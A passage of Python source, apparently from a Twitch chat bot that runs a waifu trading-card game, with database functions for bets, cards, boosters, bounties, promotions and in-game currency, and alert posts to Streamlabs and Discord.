return None
# mark the bet as closed
endTime = current_milli_time()
cur.execute("UPDATE bets SET status = 'completed', endTime = %s WHERE id = %s", [endTime, row[0]])
# calculate preliminary results
cur.close()
return getBetResults(row[0])
def getBetResults(betid):
# get bet data
cur = db.cursor()
cur.execute("SELECT status, startTime, endTime FROM bets WHERE id = %s", [betid])
betrow = cur.fetchone()
if betrow is None:
cur.close()
return None
if betrow[0] != 'completed' and betrow[0] != 'paid':
cur.close()
return None
timeresult = betrow[2] - betrow[1]
cur.execute(
"SELECT bet, userid, users.name FROM placed_bets INNER JOIN users ON placed_bets.userid = users.id WHERE betid = %s ORDER BY updated ASC",
[betid])
rows = cur.fetchall()
placements = sorted(rows, key=lambda row: abs(int(row[0]) - timeresult))
actualwinners = [{"id": row[1], "name": row[2], "bet": row[0], "timedelta": row[0] - timeresult} for row in
placements]
cur.close()
return {"result": timeresult, "winners": actualwinners}
class NotEnoughBetsException(Exception):
pass
class NoBetException(Exception):
pass
class NotOpenLongEnoughException(Exception):
pass
def startBet(channel, confirmed=False):
with db.cursor() as cur:
cur.execute("SELECT id, openedTime FROM bets WHERE channel = %s AND status = 'open' LIMIT 1", [channel])
row = cur.fetchone()
if row is not None:
if not confirmed:
cur.execute("SELECT COUNT(*) FROM placed_bets WHERE betid = %s", [row[0]])
if cur.fetchone()[0] < int(config["betMinimumEntriesForPayout"]):
raise NotEnoughBetsException()
if row[1] is not None and int(row[1]) + int(config["betMinimumMinutesOpen"])*60000 > current_milli_time():
raise NotOpenLongEnoughException()
cur.execute("UPDATE bets SET startTime = %s, status = 'started' WHERE id = %s", [current_milli_time(), row[0]])
else:
raise NoBetException()
def openBet(channel):
cur = db.cursor()
cur.execute("SELECT COUNT(*) FROM bets WHERE channel = %s AND status IN('open', 'started')", [channel])
result = cur.fetchone()[0] or 0
if result > 0:
cur.close()
return False
else:
cur.execute("INSERT INTO bets(channel, status, openedTime) VALUES (%s, 'open', %s)", [channel, current_milli_time()])
cur.close()
return True
def cancelBet(channel):
cur = db.cursor()
affected = cur.execute("UPDATE bets SET status = 'cancelled' WHERE channel = %s AND status IN('open', 'started')",
[channel])
cur.close()
return affected > 0
def getHand(twitchid):
try:
tID = int(twitchid)
except Exception:
logger.error("Got non-integer id for getHand. Aborting.")
return []
with db.cursor(pymysql.cursors.DictCursor) as cur:
cur.execute("SELECT cards.id AS cardid, waifus.name, waifus.id AS waifuid, cards.rarity, waifus.series, COALESCE(cards.customImage, waifus.image) AS image, waifus.base_rarity, cards.tradeableAt FROM cards JOIN waifus ON cards.waifuid = waifus.id WHERE cards.userid = %s AND cards.boosterid IS NULL ORDER BY COALESCE(cards.sortValue, 32000) ASC, (rarity < %s) DESC, waifus.id ASC, cards.id ASC",
[tID, int(config["numNormalRarities"])])
return cur.fetchall()
def getOpenBooster(twitchid):
try:
tID = int(twitchid)
except Exception:
logger.error("Got non-integer id for getBooster. Aborting.")
return []
with db.cursor(pymysql.cursors.DictCursor) as cur:
cur.execute("SELECT id, boostername, paid FROM boosters_opened WHERE userid = %s AND status = 'open' LIMIT 1", [tID])
booster = cur.fetchone()
if booster is None:
return None
cur.execute("SELECT cards.id AS cardid, waifus.name, waifus.id AS waifuid, cards.rarity, waifus.series, COALESCE(cards.customImage, waifus.image) AS image, waifus.base_rarity FROM cards JOIN waifus ON cards.waifuid = waifus.id WHERE cards.userid = %s AND cards.boosterid = %s ORDER BY waifus.id ASC", [tID, booster['id']])
booster['cards'] = cur.fetchall()
return booster
def getCard(cardID):
with db.cursor(pymysql.cursors.DictCursor) as cur:
cur.execute("SELECT cards.*, waifus.base_rarity, waifus.image FROM cards JOIN waifus ON cards.waifuid=waifus.id WHERE cards.id = %s", [cardID])
return cur.fetchone()
def addCard(userid, waifuid, source, boosterid=None, rarity=None):
with db.cursor() as cur:
if rarity is None:
cur.execute("SELECT base_rarity FROM waifus WHERE id = %s", [waifuid])
rarity = cur.fetchone()[0]
waifuInfo = [userid, boosterid, waifuid, rarity, current_milli_time(), userid, boosterid, source]
cur.execute("INSERT INTO cards (userid, boosterid, waifuid, rarity, created, originalOwner, originalBooster, source) VALUES(%s, %s, %s, %s, %s, %s, %s, %s)", waifuInfo)
return cur.lastrowid
def updateCard(id, changes):
changes["updated"] = current_milli_time()
with db.cursor() as cur:
cur.execute('UPDATE cards SET {} WHERE id = %s'.format(', '.join('{}=%s'.format(k) for k in changes)), list(changes.values()) + [id])
def search(query, series=None):
cur = db.cursor()
if series is None:
cur.execute("SELECT id, name, series, base_rarity FROM waifus WHERE can_lookup = 1 AND name LIKE %s",
["%" + query + "%"])
else:
cur.execute(
"SELECT id, name, series, base_rarity FROM waifus WHERE can_lookup = 1 AND name LIKE %s AND series LIKE %s",
["%" + query + "%", "%" + series + "%"])
rows = cur.fetchall()
ret = []
for row in rows:
ret.append({'id': row[0], 'name': row[1], 'series': row[2], 'base_rarity': row[3]})
return ret
def handLimit(userid):
with db.cursor() as cur:
cur.execute("SELECT 7 + paidHandUpgrades + freeUpgrades FROM users WHERE id = %s", [userid])
res = cur.fetchone()
limit = int(res[0])
return limit
def paidHandUpgrades(userid):
cur = db.cursor()
cur.execute("SELECT paidHandUpgrades FROM users WHERE id = %s", [userid])
res = cur.fetchone()
limit = int(res[0])
cur.close()
return limit
def currentCards(userid, verbose=False):
cur = db.cursor()
cur.execute(
"SELECT (SELECT COUNT(*) FROM cards WHERE userid = %s AND boosterid IS NULL AND rarity < %s), (SELECT COUNT(*) FROM bounties WHERE userid = %s AND status = 'open')",
[userid, int(config["numNormalRarities"]), userid])
result = cur.fetchone()
cur.close()
if verbose:
return {"hand": result[0], "bounties": result[1], "total": result[0] + result[1]}
else:
return result[0] + result[1]
def upgradeHand(userid, gifted=False):
cur = db.cursor()
cur.execute(
"UPDATE users SET paidHandUpgrades = paidHandUpgrades + %s, freeUpgrades = freeUpgrades + %s WHERE id = %s",
[0 if gifted else 1, 1 if gifted else 0, userid])
cur.close()
def disenchant(bot, cardid):
# return amount of points gained
with db.cursor() as cur:
card = getCard(cardid)
deValue = int(config["rarity" + str(card["rarity"]) + "Value"])
updateCard(cardid, {"userid": None, "boosterid": None})
# bounty to fill?
cur.execute(
"SELECT bounties.id, bounties.userid, users.name, bounties.amount, waifus.name, waifus.base_rarity, waifus.image FROM bounties JOIN users ON bounties.userid = users.id JOIN waifus ON bounties.waifuid = waifus.id WHERE bounties.waifuid = %s AND bounties.status = 'open' ORDER BY bounties.amount DESC LIMIT 1",
[card["waifuid"]])
order = cur.fetchone()
if order is not None:
# fill their order instead of actually disenchanting
filledCardID = addCard(order[1], card['waifuid'], "bounty")
# when we spawn a bounty card, carry over the old original owner id
updateCard(filledCardID, {"originalOwner": card['originalOwner']})
bot.message('#%s' % order[2],
"Your bounty for [%d] %s for %d points has been filled and they have been added to your hand." % (
card['waifuid'], order[4], order[3]), True)
cur.execute("UPDATE bounties SET status = 'filled', oldCard = %s, newCard = %s, updated = %s WHERE id = %s",
[cardid, filledCardID, current_milli_time(), order[0]])
sendPushNotification([order[1]], {'type': 'bountyFilled',
'image': card['customImage'] if card['customImage'] else order[6],
'message': "Your bounty for [%d] %s for %d points has been filled and they have been added to your hand." % (
card['waifuid'], order[4], order[3]),
'openurl': config['siteHost'] + '/hand?user=' + order[2]})
# alert people with lower bounties but above the cap?
base_value = int(config["rarity" + str(order[5]) + "Value"])
min_bounty = int(config["rarity" + str(order[5]) + "MinBounty"])
rarity_cap = int(config["rarity" + str(order[5]) + "MaxBounty"])
cur.execute(
"SELECT users.name, users.id FROM bounties JOIN users ON bounties.userid = users.id WHERE bounties.waifuid = %s AND bounties.status = 'open' AND bounties.amount > %s",
[card['waifuid'], rarity_cap])
otherUsers = []
for userrow in cur.fetchall():
bot.message('#%s' % userrow[0],
"A higher bounty for [%d] %s than yours was filled, so you can now cancel yours and get full points back provided you don't change it." % (
card['waifuid'], order[4]), True)
otherUsers.append(userrow[1])
if otherUsers:
sendPushNotification(otherUsers, {'type': 'bountyHigherFilled',
'image': card['customImage'] if card['customImage'] else order[6],
'message': "A higher bounty for [%d] %s than yours was filled, so you can now cancel yours and get full points back provided you don't change it." % (
card['waifuid'], order[4]),
'openurl': 'https://twitch.tv/nepnepbot'})
# give the disenchanter appropriate profit
# everything up to the min bounty, 1/2 of any amount between the min and max bounties, 1/4 of anything above the max bounty.
deValue += (min_bounty - base_value) + max(min(order[3] - min_bounty, rarity_cap - min_bounty) // 2, 0) + max((order[3] - rarity_cap) // 4, 0)
return deValue
def sendPushNotification(ids, data):
pushHeaders = {'Authorization': 'Basic ' + base64.b64encode(bytes('internal:' + config['adminPass'], 'utf-8')).decode('utf-8')}
r = requests.post(config['siteHost'] + '/sendpush', headers=pushHeaders, json={'ids': ids, 'data': data})
try:
res = r.json()
except:
logger.warning('Error during request decoding')
logger.warning(str(r.status_code))
logger.warning(r.text)
def setFavourite(userid, waifu):
with db.cursor() as cur:
cur.execute("UPDATE users SET favourite=%s WHERE id = %s", [waifu, userid])
def setDescription(userid, newDesc):
with db.cursor() as cur:
cur.execute("UPDATE users SET profileDescription=%s WHERE id = %s", [newDesc, userid])
def checkFavouriteValidity(userid):
with db.cursor() as cur:
cur.execute("SELECT favourite FROM users WHERE id = %s", [userid])
favourite = getWaifuById(cur.fetchone()[0])
valid = True
if favourite["can_favourite"] == 0:
valid = False
elif favourite["base_rarity"] >= int(config["numNormalRarities"]):
# must be owned
cur.execute("SELECT COUNT(*) FROM cards WHERE waifuid = %s AND boosterid IS NULL AND userid = %s", [favourite["id"], userid])
valid = cur.fetchone()[0] > 0
if not valid:
# reset favourite
cur.execute("UPDATE users SET favourite = 1 WHERE id = %s", [userid])
def getBadgeByID(id):
logger.debug("Getting badge for id %s", id)
try:
id = int(id)
if id < 1 or id > maxBadgeID():
logger.debug("ID was smaller than 1 or bigger than max.")
return None
except ValueError:
logger.debug("ValueError, not an int")
return None
cur = db.cursor()
cur.execute("SELECT id, name, description, image FROM badges WHERE id=%s",
[id])
row = cur.fetchone()
ret = {"id": row[0], "name": row[1], "image": row[3], "description": row[2]}
cur.close()
logger.debug("Fetched Badge from id: %s", ret)
return ret
def addBadge(name, description, image):
"""Adds a new Badge to the database"""
with db.cursor() as cur:
cur.execute("INSERT INTO badges(name, description, image) VALUES(%s, %s, %s)", [name, description, image])
return cur.lastrowid
def giveBadge(userid, badge):
"""Gives a user a badge"""
badgeObj = getBadgeByID(badge)
if badgeObj is None:
return False
else:
try:
with db.cursor() as cur:
cur.execute("INSERT INTO has_badges(userID, badgeID) VALUES(%s, %s)", [userid, badge])
except:
logger.debug("Had an error.")
return False
return True
def getHoraro():
r = requests.get(
"https://horaro.org/-/api/v1/schedules/{horaroid}/ticker".format(horaroid=config["horaroID"]))
try:
j = r.json()
# ("got horaro ticker: " + str(j))
return j
except Exception:
logger.error("Horaro Error:")
logger.error(str(r.status_code))
logger.error(r.text)
def getRawRunner(runner):
if '[' not in runner:
return runner
return runner[runner.index('[') + 1 : runner.index(']')]
def updateBoth(game, title):
if not booleanConfig("marathonBotFunctions"):
return
myheaders = headers.copy()
myheaders["Authorization"] = "OAuth " + config["marathonOAuth"].replace("oauth:", "")
myheaders["Content-Type"] = "application/json"
myheaders["Accept"] = "application/vnd.twitchtv.v5+json"
body = {"channel": {"status": str(title), "game": str(game)}}
logger.debug(str(body))
r = requests.put("https://api.twitch.tv/kraken/channels/"+config["marathonChannelID"], headers=myheaders, json=body)
try:
j = r.json()
logger.debug("Response from twitch: "+str(j))
# print("tried to update channel title, response: " + str(j))
except Exception:
logger.error(str(r.status_code))
logger.error(r.text)
def updateTitle(title):
if not booleanConfig("marathonBotFunctions"):
return
myheaders = headers.copy()
myheaders["Authorization"] = "OAuth " + config["marathonOAuth"].replace("oauth:", "")
myheaders["Content-Type"] = "application/json"
myheaders["Accept"] = "application/vnd.twitchtv.v5+json"
body = {"channel": {"status": str(title)}}
r = requests.put("https://api.twitch.tv/kraken/channels/"+config["marathonChannelID"], headers=myheaders, json=body)
try:
j = r.json()
except Exception:
logger.error(str(r.status_code))
logger.error(r.text)
def updateGame(game):
if not booleanConfig("marathonBotFunctions"):
return
myheaders = headers.copy()
myheaders["Authorization"] = "OAuth " + config["marathonOAuth"].replace("oauth:", "")
myheaders["Content-Type"] = "application/json"
myheaders["Accept"] = "application/vnd.twitchtv.v5+json"
body = {"channel": {"game": str(game)}}
r = requests.put("https://api.twitch.tv/kraken/channels/"+config["marathonChannelID"], headers=myheaders, json=body)
try:
j = r.json()
except Exception:
logger.error(str(r.status_code))
logger.error(r.text)
def sendStreamlabsAlert(channel, data):
if '#' in channel:
channel = channel[1:]
with busyLock:
with db.cursor() as cur:
cur.execute("SELECT alertkey FROM channels WHERE name = %s LIMIT 1", [channel])
tokenRow = cur.fetchone()
if tokenRow is not None and tokenRow[0] is not None:
data['access_token'] = tokenRow[0]
with streamlabsLock:
try:
req = requests.post(streamlabsalerturl, headers=alertheaders, json=data)
if req.status_code != 200:
logger.debug("response for streamlabs alert: %s; %s", str(req.status_code), str(req.text))
except Exception:
logger.error("Tried to send a Streamlabs alert to %s, but failed." % channel)
logger.error("Error: %s", str(sys.exc_info()))
def sendDiscordAlert(data):
with discordLock:
for url in discordhooks:
req2 = requests.post(
url,
json=data)
while req2.status_code == 429:
time.sleep((int(req2.headers["Retry-After"]) / 1000) + 1)
req2 = requests.post(
url,
json=data)
def sendAdminDiscordAlert(data):
with discordLock:
req2 = requests.post(config["adminDiscordHook"], json=data)
while req2.status_code == 429:
time.sleep((int(req2.headers["Retry-After"]) / 1000) + 1)
req2 = requests.post(
config["adminDiscordHook"],
json=data)
def sendDrawAlert(channel, waifu, user, discord=True):
logger.info("Alerting for waifu %s", str(waifu))
with busyLock:
cur = db.cursor()
# check for first time drop
first_time = "pulls" in waifu and waifu['pulls'] == 0
message = "*{user}* drew {first_time}[*{rarity}*] {name}!".format(user=str(user),
rarity=str(config["rarity" + str(
waifu["base_rarity"]) + "Name"]),
name=str(waifu["name"]),
first_time=(
"the first ever " if first_time else ""))
chanOwner = str(channel).replace("#", "")
cur.execute("SELECT config, val FROM alertConfig WHERE channelName = %s", [chanOwner])
rows = cur.fetchall()
colorKey = "rarity" + str(waifu["base_rarity"]) + "EmbedColor"
colorInt = int(config[colorKey])
# Convert RGB int to RGB values
blue = colorInt & 255
green = (colorInt >> 8) & 255
red = (colorInt >> 16) & 255
alertconfig = {}
for row in rows:
alertconfig[row[0]] = row[1]
keys = alertconfig.keys()
alertChannel = "donation" if "alertChannel" not in keys else alertconfig["alertChannel"]
defaultSound = config["alertSound"] if "defaultSound" not in keys else alertconfig["defaultSound"]
alertSound = defaultSound if str("rarity" + str(waifu["base_rarity"]) + "Sound") not in keys else alertconfig[
str("rarity" + str(waifu["base_rarity"]) + "Sound")]
defaultLength = config["alertDuration"] if "defaultLength" not in keys else alertconfig["defaultLength"]
alertLength = defaultLength if str("rarity" + str(waifu["base_rarity"]) + "Length") not in keys else \
alertconfig[str("rarity" + str(waifu["base_rarity"]) + "Length")]
alertColor = "default" if "color" not in keys else alertconfig["color"]
if "id" in waifu:
cur.execute("SELECT sound, length FROM waifuAlerts WHERE waifuid=%s", [waifu["id"]])
rows = cur.fetchall()
if len(rows) == 1:
alertLength = int(rows[0][1])
alertSound = str(rows[0][0])
alertbody = {"type": alertChannel, "image_href": waifu["image"],
"sound_href": alertSound, "duration": int(alertLength), "message": message}
if alertColor == "rarity":
alertbody["special_text_color"] = "rgb({r}, {g}, {b})".format(r=str(red), g=str(green), b=str(blue))
cur.close()
threading.Thread(target=sendStreamlabsAlert, args=(channel, alertbody)).start()
if discord:
# check for first time drop
rarityName = str(config["rarity" + str(waifu["base_rarity"]) + "Name"])
discordbody = {"username": "Waifu TCG", "embeds": [
{
"title": "A{n} {rarity} waifu has been dropped{first_time}!".format(
rarity=rarityName,
first_time=(" for the first time" if first_time else ""),
n='n' if rarityName[0] in ('a', 'e', 'i', 'o', 'u') else '')
},
{
"type": "rich",
"title": "{user} dropped [{wid}] {name}!".format(user=str(user), wid=str(waifu["id"]),
name=str(waifu["name"])),
"url": "https://twitch.tv/{name}".format(name=str(channel).replace("#", "").lower()),
"footer": {
"text": "Waifu TCG by Marenthyu"
},
"image": {
"url": str(waifu["image"])
},
"provider": {
"name": "Marenthyu",
"url": "https://marenthyu.de"
}
}
]}
if colorKey in config:
discordbody["embeds"][0]["color"] = int(config[colorKey])
discordbody["embeds"][1]["color"] = int(config[colorKey])
threading.Thread(target=sendDiscordAlert, args=(discordbody,)).start()
def sendDisenchantAlert(channel, waifu, user):
# no streamlabs alert for now
# todo maybe make a b&w copy of the waifu image
discordbody = {"username": "Waifu TCG", "embeds": [
{
"title": "A {rarity} waifu has been disenchanted!".format(
rarity=str(config["rarity" + str(waifu["base_rarity"]) + "Name"]))
},
{
"type": "rich",
"title": "[{wid}] {name} has been disenchanted! Press F to pay respects.".format(name=str(waifu["name"]),
wid=str(waifu["id"])),
"footer": {
"text": "Waifu TCG by Marenthyu"
},
"image": {
"url": str(waifu["image"])
},
"provider": {
"name": "Marenthyu",
"url": "https://marenthyu.de"
}
}
]}
colorKey = "rarity" + str(waifu["base_rarity"]) + "EmbedColor"
if colorKey in config:
discordbody["embeds"][0]["color"] = int(config[colorKey])
discordbody["embeds"][1]["color"] = int(config[colorKey])
threading.Thread(target=sendDiscordAlert, args=(discordbody,)).start()
def sendPromotionAlert(userid, waifuid, new_rarity):
with busyLock:
# check for duplicate alert and don't send it
# UNLESS this is a promotion to MAX rarity
if new_rarity != int(config["numNormalRarities"]) - 1:
with db.cursor() as cur:
cur.execute(
"SELECT COUNT(*) FROM promotion_alerts_sent WHERE userid = %s AND waifuid = %s AND rarity >= %s",
[userid, waifuid, new_rarity])
result = cur.fetchone()[0]
if result > 0:
return
# get data necessary for the alert and note that we sent it
# TODO maybe use display name instead
waifu = getWaifuById(waifuid)
with db.cursor() as cur:
cur.execute("SELECT name FROM users WHERE id = %s", [userid])
username = cur.fetchone()[0]
cur.execute("REPLACE INTO promotion_alerts_sent (userid, waifuid, rarity) VALUES(%s, %s, %s)",
[userid, waifuid, new_rarity])
# compile alert
discordbody = {"username": "Waifu TCG", "embeds": [
{
"title": "A waifu has been promoted!",
"color": int(config["rarity%dEmbedColor" % new_rarity])
},
{
"type": "rich",
"title": "{user} promoted [{wid}] {name} to {rarity} rarity!".format(user=username, name=waifu["name"],
wid=str(waifu["id"]),
rarity=config[
"rarity%dName" % new_rarity]),
"color": int(config["rarity%dEmbedColor" % new_rarity]),
"footer": {
"text": "Waifu TCG by Marenthyu"
},
"image": {
"url": waifu["image"]
},
"provider": {
"name": "Marenthyu",
"url": "https://marenthyu.de"
}
}
]}
threading.Thread(target=sendDiscordAlert, args=(discordbody,)).start()
def naturalJoinNames(names):
if len(names) == 1:
return names[0]
return ", ".join(names[:-1]) + " and " + names[-1]
def getWaifuRepresentationString(waifuid, baserarity=None, cardrarity=None, waifuname=None):
if baserarity == None or cardrarity == None or waifuname == None:
waifuData = getWaifuById(waifuid)
if baserarity == None:
baserarity = waifuData['base_rarity']
if cardrarity == None:
cardrarity = baserarity
if waifuname == None:
waifuname = waifuData['name']
promoteDiff = cardrarity - baserarity
promoteStars = (" (" + ("★" * (promoteDiff)) + ")") if promoteDiff > 0 else ""
retStr = "[%d][%s%s] %s" % (
waifuid, config["rarity" + str(cardrarity) + "Name"], promoteStars, waifuname)
return retStr
def sendSetAlert(channel, user, name, waifus, reward, firstTime, discord=True):
logger.info("Alerting for set claim %s", name)
with busyLock:
with db.cursor() as cur:
chanOwner = str(channel).replace("#", "")
cur.execute("SELECT config, val FROM alertConfig WHERE channelName = %s", [chanOwner])
rows = cur.fetchall()
alertconfig = {row[0]: row[1] for row in rows}
alertChannel = "donation" if "alertChannel" not in alertconfig else alertconfig["alertChannel"]
defaultSound = config["alertSound"] if "defaultSound" not in alertconfig else alertconfig["defaultSound"]
alertSound = defaultSound if "setClaimSound" not in alertconfig else alertconfig["setClaimSound"]
defaultLength = config["alertDuration"] if "defaultLength" not in alertconfig else alertconfig["defaultLength"]
alertLength = defaultLength if "setClaimLength" not in alertconfig else alertconfig["setClaimLength"]
message = "{user} claimed the set {name}!".format(user=user, name=name)
alertbody = {"type": alertChannel, "sound_href": alertSound, "duration": int(alertLength), "message": message}
threading.Thread(target=sendStreamlabsAlert, args=(channel, alertbody)).start()
discordbody = {"username": "Waifu TCG", "embeds": [
{
"title": "A set has been completed%s!" % (" for the first time" if firstTime else ""),
"color": int(config["rarity" + str(int(config["numNormalRarities"]) - 1) + "EmbedColor"])
},
{
"type": "rich",
"title": "{user} completed the set {name}!".format(user=str(user), name=name),
"description": "They gathered {waifus} and received {reward} as their reward.".format(waifus=naturalJoinNames(waifus), reward=reward),
"url": "https://twitch.tv/{name}".format(name=str(channel).replace("#", "").lower()),
"color": int(config["rarity" + str(int(config["numNormalRarities"]) - 1) + "EmbedColor"]),
"footer": {
"text": "Waifu TCG by Marenthyu"
},
"provider": {
"name": "Marenthyu",
"url": "https://marenthyu.de"
}
}
]}
if discord:
threading.Thread(target=sendDiscordAlert, args=(discordbody,)).start()
def followsme(userid):
try:
krakenHeaders = {"Authorization": "OAuth %s" % config["appAccessToken"],
"Accept": "application/vnd.twitchtv.v5+json"}
r = requests.get(
"https://api.twitch.tv/kraken/users/{twitchid}/follows/channels/{myid}".format(twitchid=str(userid),
myid=str(
config["twitchid"])),
headers=krakenHeaders)
j = r.json()
return "channel" in j and "_id" in j["channel"] and int(config["twitchid"]) == int(j["channel"]["_id"])
except Exception:
return False
def getWaifuById(id):
try:
id = int(id)
if id < 1:
return None
except ValueError:
return None
with db.cursor(pymysql.cursors.DictCursor) as cur:
cur.execute("SELECT id, name, image, base_rarity, series, can_lookup, pulls, last_pull, can_favourite, can_purchase FROM waifus WHERE id=%s", [id])
return cur.fetchone()
def getWaifuOwners(id, rarity):
with db.cursor() as cur:
baseRarityName = config["rarity%dName" % rarity]
godRarity = int(config["numNormalRarities"]) - 1
cur.execute(
"SELECT users.name, c1.rarity, IF(c1.boosterid IS NOT NULL, 1, 0), IF(c1.rarity = %s AND NOT EXISTS(SELECT id FROM cards c2 WHERE c2.userid IS NOT NULL AND c2.rarity = %s AND c2.waifuid = c1.waifuid AND (c2.created < c1.created OR (c2.created=c1.created AND c2.id < c1.id))), 1, 0) AS firstGod FROM cards c1 JOIN users ON c1.userid = users.id WHERE c1.waifuid = %s AND c1.userid IS NOT NULL ORDER BY firstGod DESC, c1.rarity DESC, c1.created ASC, users.name ASC",
[godRarity, godRarity, id])
allOwners = cur.fetchall()
# compile per-owner data grouped into not in booster / in booster
ownerDescriptions = [[], []]
for i in range(2):
ownerData = OrderedDict()
ownedByOwner = {}
for row in allOwners:
if row[2] != i:
continue
if row[0] not in ownerData:
ownerData[row[0]] = OrderedDict()
ownedByOwner[row[0]] = 0
rarityName = ("α" if row[3] else "") + config["rarity%dName" % row[1]]
if rarityName not in ownerData[row[0]]:
ownerData[row[0]][rarityName] = 0
ownerData[row[0]][rarityName] += 1
ownedByOwner[row[0]] += 1
for owner in ownerData:
if len(ownerData[owner]) != 1 or baseRarityName not in ownerData[owner] or ownedByOwner[owner] > 1:
# verbose
ownerDescriptions[i].append(owner + " (" + ", ".join([("%d %s" % (ownerData[owner][k], k) if ownerData[owner][k] > 1 else k) for k in ownerData[owner]]) + ")")
else:
ownerDescriptions[i].append(owner)
return ownerDescriptions
def hasPoints(userid, amount):
cur = db.cursor()
cur.execute("SELECT points FROM users WHERE id = %s", [userid])
ret = int(cur.fetchone()[0]) >= int(amount)
cur.close()
return ret
def addPoints(userid, amount):
cur = db.cursor()
cur.execute("UPDATE users SET points = points + %s WHERE id = %s", [amount, userid])
cur.close()
def getPuddingBalance(userid):
with db.cursor() as cur:
cur.execute("SELECT puddingCurrent, puddingPrevious, puddingExpiring FROM users WHERE id = %s", [userid])
pinfo = cur.fetchone()
return None if pinfo is None else [int(n) for n in pinfo]
def hasPudding(userid, amount):
bal = getPuddingBalance(userid)
return bal is not None and sum(bal) >= amount
def addPudding(userid, amount):
with db.cursor() as cur:
cur.execute("UPDATE users SET puddingCurrent = puddingCurrent + %s WHERE id = %s", [amount, userid])
def takePudding(userid, amount):
pinfo = getPuddingBalance(userid)
if pinfo is None or sum(pinfo) < amount:
raise ValueError()
# take from the pudding starting from the expiring amount first
idx = 2
while amount > 0:
new_val = max(pinfo[idx] - amount, 0)
amount -= pinfo[idx] - new_val
pinfo[idx] = new_val
idx -= 1
# save the updated values
with db.cursor() as cur:
cur.execute("UPDATE users SET puddingCurrent = %s, puddingPrevious = %s, puddingExpiring = %s WHERE id = %s", pinfo + [userid])
def maxWaifuID():
cur = db.cursor()
cur.execute("SELECT MAX(id) FROM waifus")
ret = int(cur.fetchone()[0])
cur.close()
return ret
def maxBadgeID():
cur = db.cursor()
cur.execute("SELECT MAX(id) FROM badges")
ret = int(cur.fetchone()[0])
cur.close()
return ret
def getUniqueCards(userid):
with db.cursor() as cur:
uniqueRarities = [rarity for rarity in range(int(config["numNormalRarities"])) if
int(config["rarity%dBuyPrice" % rarity]) <= 0]
if len(uniqueRarities) == 0:
return []
else:
inStr = ",".join(["%s"] * len(uniqueRarities))
cur.execute("SELECT DISTINCT waifuid FROM cards WHERE userid = %s AND boosterid IS NULL AND rarity IN ({0})".format(inStr),
[userid] + uniqueRarities)
rows = cur.fetchall()
return [row[0] for row in rows]
def dropCard(rarity=-1, upgradeChances=None, useEventWeightings=False, allowDowngrades=True, bannedCards=None):
random.seed()
if rarity == -1:
maxrarity = int(config["numNormalRarities"]) - 1
if upgradeChances is None:
upgradeChances = [float(config["rarity%dUpgradeChance" % i]) for i in range(maxrarity)]
else:
assert len(upgradeChances) == maxrarity
rarity = 0
while (rarity < maxrarity):
if random.random() < upgradeChances[rarity]:
rarity += 1
else:
break
return dropCard(rarity=rarity, useEventWeightings=useEventWeightings, allowDowngrades=allowDowngrades,
bannedCards=bannedCards)
else:
with db.cursor() as cur:
if bannedCards is not None and len(bannedCards) > 0:
banClause = " AND id NOT IN(" + ",".join(["%s"] * len(bannedCards)) + ")"
else:
banClause = ""
bannedCards = []
weighting_column = "(event_weighting*normal_weighting)" if useEventWeightings else "normal_weighting"
result = None
if rarity >= int(config["strongerWeightingMinRarity"]):
cur.execute("SELECT id FROM waifus WHERE base_rarity = %s{1} AND normal_weighting >= 1 ORDER BY -LOG(1-RAND())/{0} LIMIT 1".format(weighting_column, banClause), [rarity] + bannedCards)
result = cur.fetchone()
if result is None:
cur.execute("SELECT id FROM waifus WHERE base_rarity = %s{1} ORDER BY -LOG(1-RAND())/{0} LIMIT 1".format(weighting_column, banClause), [rarity] + bannedCards)
result = cur.fetchone()
if result is None:
# no waifus left at this rarity
logger.info("No droppable waifus left at rarity %d" % rarity)
if allowDowngrades:
return dropCard(rarity=rarity - 1, useEventWeightings=useEventWeightings, bannedCards=bannedCards)
else:
return None
else:
return result[0]
def recordPullMetrics(*cards):
with db.cursor() as cur:
inString = ",".join(["%s"] * len(cards))
pullTime = current_milli_time()
cur.execute(
"UPDATE waifus SET normal_weighting = normal_weighting / %s, pulls = pulls + 1, last_pull = %s WHERE id IN({0}) AND normal_weighting <= 1".format(
inString), [float(config["weighting_increase_amount"])**4, pullTime] + list(cards))
cur.execute(
"UPDATE waifus SET normal_weighting = 1, pulls = pulls + 1, last_pull = %s WHERE id IN({0}) AND normal_weighting > 1".format(
inString), [pullTime] + list(cards))
def attemptPromotions(*cards):
promosDone = {}
with db.cursor() as cur:
for waifuid in cards:
while True:
usersThisCycle = []
cur.execute(
"SELECT userid, rarity, COUNT(*) AS amount FROM cards JOIN waifus ON cards.waifuid = waifus.id WHERE cards.waifuid = %s AND cards.boosterid IS NULL AND cards.userid IS NOT NULL AND waifus.can_promote = 1 GROUP BY cards.userid, cards.rarity HAVING COUNT(*) > 1 ORDER BY cards.rarity ASC, RAND() ASC",
[waifuid])
candidates = cur.fetchall()
for row in candidates:
if row[0] in usersThisCycle:
continue
userid = row[0]
rarity = row[1]
amount = row[2]
if rarity < int(config["numNormalRarities"]) - 1 and amount >= int(
config["rarity%dPromoteAmount" % rarity]):
promoteAmount = int(config["rarity%dPromoteAmount" % rarity])
amountToMake = amount // promoteAmount
if amountToMake != 0:
usersThisCycle.append(userid)
# fetch card ids to use - take the ones with the least trade restrictions
cur.execute("SELECT id, COALESCE(tradeableAt, 0) FROM cards WHERE waifuid = %s AND userid = %s AND rarity = %s AND boosterid IS NULL ORDER BY tradeableAt ASC", [waifuid, userid, rarity])
fodder = cur.fetchall()
for i in range(amountToMake):
material = fodder[i*promoteAmount:(i+1)*promoteAmount]
tradeTS = max([row[1] for row in material])
for row in material:
updateCard(row[0], {"userid": None, "boosterid": None})
newID = addCard(userid, waifuid, 'promotion', None, rarity+1)
if tradeTS > 0:
updateCard(newID, {"tradeableAt": tradeTS})
# update promosDone
if userid not in promosDone:
promosDone[userid] = {}
if waifuid not in promosDone[userid] or promosDone[userid][waifuid] < rarity + 1:
promosDone[userid][waifuid] = rarity + 1
if len(usersThisCycle) == 0:
# nothing changed, we're done
break
# promo alerts
for user in promosDone:
for waifu in promosDone[user]:
if promosDone[user][waifu] >= int(config["promotionAlertMinimumRarity"]):
threading.Thread(target=sendPromotionAlert, args=(user, waifu, promosDone[user][waifu])).start()
def formatRank(rankNum):
if (rankNum % 100) // 10 == 1 or rankNum % 10 == 0 or rankNum % 10 > 3:
return "%dth" % rankNum
elif rankNum % 10 == 1:
return "%dst" % rankNum
elif rankNum % 10 == 2:
return "%dnd" % rankNum
else:
return "%drd" % rankNum
